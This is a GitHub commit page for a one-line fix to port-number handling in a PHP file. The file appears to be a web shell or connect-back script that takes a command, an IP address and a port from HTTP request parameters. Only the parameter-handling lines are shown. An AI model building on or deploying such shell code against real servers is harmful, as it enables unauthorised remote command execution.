fix logic bug setting port number

This commit is contained in:
Cameron Unterberger 2022-04-18 20:54:43 -04:00 committed by GitHub
parent 168584fdc6
commit 60ac224950
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -30,7 +30,7 @@ if(isset($_REQUEST[$cmd])) {
# default port 443
$port = '443';
if(isset($_REQUEST[$ip])){
if(isset($_REQUEST[$port])){
$port = $_REQUEST[$port];
}